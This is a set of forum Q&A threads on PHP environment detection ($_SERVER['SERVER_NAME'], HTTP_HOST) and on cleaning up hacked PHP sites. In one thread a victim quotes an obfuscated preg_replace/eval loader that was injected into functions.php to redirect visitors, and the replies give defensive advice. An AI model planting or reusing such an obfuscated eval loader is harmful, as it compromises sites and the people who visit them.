Does anyone know if there's a way to send PHP a different $_SERVER['SERVER_NAME'] value to the one that's actually being used to call Apache? I.E: if the user types dev.mydomain.com in the URL bar of the browser, it arrives at the correct IP address, but tells PHP that the server name is live.mydomain.com? I've Googled around for this, but not found anything.
"Why do I want to do this?" I hear you ask
I've inherited a large PHP system that makes a lot of decisions based on the domain name being used to call the system. The domain name is sometimes hardcoded, and sometimes stored in the database.
I now need to make a development environment separate from the live environment. I could search and replace all those domain names, but I then have different code for the two environments, and problems with the code versioning.
Please note
I don't need the user to hack or fake anything, so there's no security issues. I want, as the site administrator, Apache and PHP to use different domain names.
The following 'solutions' are not what I'm asking
ServerAlias : No. Apache still sends the wrong domain name to the code.
Redirecting : Is only going to send the request to the wrong server.
Hacking the client's host file : Sure I can do that on my own machine, but a number of 'technically naive' people without administrator rights on their machines also need to test the development site. And they would need to remember to change it back when done tesing. It would become unworkable.
Any ideas please?
After another 3 hours searching on the internet, I eventually found an answer. I'll leave it here for the next person searching how to do this.
First things first. ModRewrite was not the answer! By the time Apache is processing its ModRewrite and SetEnv settings, the SERVER_NAME and 'HTTP_HOST' variables are cast in stone. You can try resetting them, but your PHP won't ever see the changed values.
What does work is PHP's auto_prepend option. How you set this depends on your PHP setup, but the flag is as follows:
auto_prepend_file=prepend.php
Then create the prepend.php file in your document root:
<?php
if($_SERVER['HTTP_HOST'] == 'dev.mydomain.com'){
$_SERVER['HTTP_HOST']= 'live.mydomain.com';
$_SERVER['SERVER_NAME']= 'live.mydomain.com';
}
?>
It even works in Symfony. All you have to do is ensure the prepend.php file stays out of your master repository.
And then, literally 30 seconds after posting the question, I thought to myself: "Hang on... You haven't tried ModRewrite yet. I'll leave the question here for now. I could get other useful feedback!
Related
For several years, I have been using the approach usually recommended to check whether a page was invoked locally or remotely by inspecting whether $_SERVER['SERVER_ADDR'] equals 127.0.0.1 or is empty. This has been discussed in other questions, such as this and this. Other superglobals such as $_SERVER['REMOTE_ADDR'] are also often mentioned.
Over time, I have found that this approach sometimes seems to fail.
What I really want to know is whether the script has been invoked on my dev server (xampp, wamp, IDE debugger...) or on a production server. This is so that paths to scripts above the web root can be properly set. While this works 99.999% of the time, it seems that sometimes, when Apache redirects to a 404 page, the $_SERVER['SERVER_ADDR'] must be lost, and a script running on a production server passes the "local" test.
As a result, I am looking for other approaches. Of course I may be doing something wrong in Apache, but regardless, it would be good to have a foolproof test in php.
A couple ideas came to me, and I wonder if these are safe, or whether someone has a better idea.
A. One idea is to look at the current path: something like
define ( 'DEV_SERVER',
(substr(
strtolower($_SERVER['DOCUMENT_ROOT']),
0,8)
=="c:/xampp")
);
B. Another idea would be to check for the existence of a local file with a particular name, but hitting the file system seems like too much work.
Thanks in advance for all insights!
You could also try gethostname().
Although, the best method is probably to only deploy dev specific stuff to dev servers. I.e. keep those scripts separate to your production / regression testing scripts. You don't want these DEV server specific stuff to accidentally become visible to users.
I am curious if doing something like setting your "environment" to Production, Dev, Staging, etc. based on a domain name such as dev.domain.com, staging.domain.com is a bad idea.
Can somebody just edit their hosts file to point dev.domain.com to domain.com so now the system thinks it's in Dev when it really is in Prod? This would mean any Dev specific code will be ran by a complete stranger.
Is this possible or is there a better way to determine your environment such as setting it manually in a server variable?
For reference, I am using PHP.
I would set the environment in a server variable on the machine. This allows you to control it during deployment and it cannot be mucked around with by people who are not authorized to do so. Although if you are worried about developers inadvertently connecting to production that is a whole other issue. You should be controlling access to production credentials via some other process such as jndi (in the java world) or environment keys replaced at runtime or deploy time (works in any language).
Setting your "environment" to Production, Dev, Staging, etc. based on a domain name is absolutely safe. This is, because you have total control about what your domain name is.
BEWARE: do not trust what others make you believe what your domain name is. For example, $_SERVER['HTTP_HOST'] is not your domain name. It is the value of the HTTP Host header, that the client sent you, and is therefore free to manipulate.
This is depends on how do you use your domain? Suppose that there are domain.com but there are several sub-domain, sub1.domain.com, sub2.domain.com, etc and every sub domain is managed by different user and/or application!
Some how I have managed to be attacked in a very specific manner on a site I help mantain and I am looking into whether or not the server was directly hacked or someone was able to inject the malicious script somehow.
First someone managed to get this:
#preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");
Into the very top of a PHP file right after the files comments. What this, and most likey other code did, was 301 redirect anyone not connecting to the site through a browser to a payday loan site. This ONLY effected my homepage, all other pages where fine.
There was probably more code to do it but this was the most confusing part since this code sits in a file called functions.php which is only ever included however IT IS the first file to be included within index.php (my homepage).
It is completely confusing me how some one could have got code there without directly hacking the server, there is no user input used there, it is literally sitting above the entire file. There is nothing there except this injected code and some comments above.
My envo is:
Gentoo
PHP 5.2.14-pl0-gentoo
Apache 2
I have checked server logs however, as usual, they deleted their trail.
This is also partly, as you have noticed, a server question but atm it is 90% programming question so I thought I would ask it here first.
Is there any vulnerability within PHP that could cause this?
If you need clarification let me know.
Edit
I have a staging system which has a
Work
Preview
Live
I know this is nothing to do with SQL injection since if I switch live and preview folder around I get no problems. I also do not store the gentoo password within the DB or the App and you can only connect to the server in a small range of IP addresses except for Apache which accept 80 and 443 connections from any host. Plus I use SQL escaping classes and methods within the site (PDO, MySQLi etc).
So this problem (which is even more confusing) is only located within one copy of my site and not the DB or anything.
Pinpointing this kind of things is more on the server admin side I guess. Check the attacker-modified file date, and look for for suspicious activity in that date and time in the server's log (apache logs, FTP logs, ssh logs maybe). This also may depend on your traffic, log size, and level of access to your server, as it may be prohibitive. If you have any html form that upload files, verify the directory in wich the files are stored for php shells . Also check the permissions on that directory. If you are on a shared hosting, this also can be the result of the attacker injecting a shell on another site, and then attacking yours by that mean. In that case contact your hosting company.
It's 99% chance the webserver fault, SQL injection is one thing, but I don't know, maybe they managed to somehow get your password with SQL injection and then log in to a control panel or ftp, but, I'd say it's the webserver.
Ok so I understand how and why now. It was the one thing I thought it would never be: Wordpress.
I was basically a victim of: http://muninn.net/blog/2012/06/a-tale-of-east-asian-history-british-loan-sharks-and-a-russian-hacker.html
Using a tool like: http://www.youtube.com/watch?v=y-Z5-uHvONc
You see even though my main site is not made from wordpress and it has got a wordpress blog located at: /blog/ the hacker was able to use various Wordpress vulnerabilities to get around the location problem and plant scripts on any part of the server.
By the way, this actually happened on the latest install of Wordpress. Double checked the version. We are not totally sure exactly when he placed the script (there are multiple instances of the foreign script being placed throughout the years!) but we do know this recent attack must have been sited also quite recently which puts the latest version (or the version before) under a huge amount of scrutiny.
So a nice note of caution about Wordpress there...
I have a public facing debug script that I would only like to run on certain dev boxes, I was hoping to do this programatically inside this script, by detecting the server ip or name-
So I have a question about the security of $_SERVER and $_SERVER['HTTP_HOST'] in particular.
From this: http://shiflett.org/blog/2006/mar/server-name-versus-http-host blog post I have gathered that this var is pretty insecure, and can't be trusted.
What is the best way to find out from php what box you are currently on?
I thought of using FILE , since that seems to be pretty secure, but I'm not sure I have enough info just from the file path.
I don't necessarily need the server name, even ip would be fine.
thanks in advance.
The best way? It depends on the level of control you have on your environment. Here are some options:
Set an environmental variable via the webserver to indicate the box.
if (getenv('env_server') == 'production')
This is nice, since there's no files that you need to worry about. Just the webserver configuration.
Set a file in a "known" place on the server, and check that (one file for the entire server).
require('/path/to/environment.php');
That file should define a constant to determine the environment.
Manually configure each application for the server. This is the easiest to do, since it doesn't require anything on the server side, but it's also the least convenient since you need to manually configure each install...
External IP address used to get to the site:
$_SERVER['SERVER_ADDR']
This is nice since it requires no additional configuration on the server side. But it will require you to keep a map of all active IP addresses, and the servers they are bound to (especially since more than 1 IP can point to the same server)...
The best method is to explicitly define the machine by placing an environment config file on it and checking for it:
if (file_exists('environment.php')) {
include 'environment.php';
}
This file could contain just the name of the machine you're on, or configuration settings like $debug = 0 or whatever else you want to customize for specific machines.
What is the best way to find out from php what box you are currently on?
$_SERVER["SERVER_NAME"] will usually be fine. The security problems Chris outlines need very, very specific circumstances to work.
$_SERVER["SERVER_ADDR"] would be an alternative, too.
Other than that, I would tend to go with __FILE__ if there is any chance of getting a hint from the path.
You could use exec() to run a shell command.
echo exec('hostname');
This can get the IP address on OS X, may be platform specific.
echo exec('ifconfig | grep "inet " | grep -v 127.0.0.1 | cut -d\ -f2');
Like always, just want to say thank you for all of the help and input in advance.
I have a particular site that I am the web developer for and am running into a unique problem. It seems that somehow something is getting into every single PHP file on my site and adding some malware code. I have deleted the code from every page multiple times and changed FTP and DB passwords, but to no avail.
The code that is added looks like this - eval(base64_decode(string)) - which the string is 3024 characters.
Not sure if anyone else has ran into this problem or if any one has ideas on how I can secure my php code up.
Thanks again.
The server itself could be compromised. Report the problem to your web host. What is their response?
An insecure PHP script coupled with incorrect file permissions could give the attacker the ability to modify your PHP files. To eliminate this possibility I would take the site down, delete all the files, re-upload, then switch permissions on the entire site to deny any writes to the file system.
Edit:
As a short-term fix try asking your web host to disable eval() for your account. If they're worth their salt they should be running Suhosin which has an option to disable eval.
You should use "disable_functions=eval,exec" in your php.ini or .htaccess as first measure.
yes i have ran into this problem myself, i take it you are on a shared host? are you perchance on rackspacecloud?
this is where i had that problem, the first thing you need to do right away is notify your host, this is a hosting issue, and i suspect the malware has gained access to your server on an ftp level.
make sure you have nothing chmod 777 world writable, if it needs to be writable by your app make it 775
hope this helps, good luck
You should change the file permissions so that only you can write to those files. 0777 (the default on some hosts, I believe) is just asking for trouble. See File Permissions.
Also, it's advisable to not put any files that aren't supposed to be accessible by URL outside of the public_html folder, for example, config files.
I had a similar problem. However, my problem was that I was running a python code evaluator on my site. As far as I remember you need to use eval() function to execute the python code. In one of my php files I had a weird eval statement. What kind of script are you developing? I mean does it involve evaluation of some other code?
You should also note that (assuming you are using a hosting solution to host your site) that it's almost never your fault. An example being that networksolutions hosting company recently had a server hacked and over 1K webpages were affected, not due to security holes on each particular site, but due to some bad configuration/monitering of what was put on that particular server that hosts those sites. If you can't see any thing security wise wrong with your code, aka you sanitize everything properly and or you are running a non vulnerable version of whatever CMS you are using (if your using a CMS) then it's probably not an issue with your site, just the server in general.
You should move to another server. It would appear that the attacker has access to the server or is running some code as a background process which is overwriting the files. It may be possible to identify and remove the problem, but smart attackers will hide additional scripts etc to trip you up later.
I've come across viruses that read filezilla conf files.
I SWEAR TO GOD. at first i was: WOW, then i was: mother f*** sneaky b*stards.
Check your pc for viruses.
One of the possible scenarios is that somebody managed to get write access somehow and changing passwords etc. helped, but he left a php file that can still run.
See if there are any unknown files there. Or delete every damn thing and restore some backups.
Get the last modified time of your files, then go over to your access logs (FTP, HTTP whatever's open, if you don't know where they are ask your host) and find out who was mucking around on your system at that time.
Likely the attacker has installed a script that they can call periodically to re-infect any files you fix.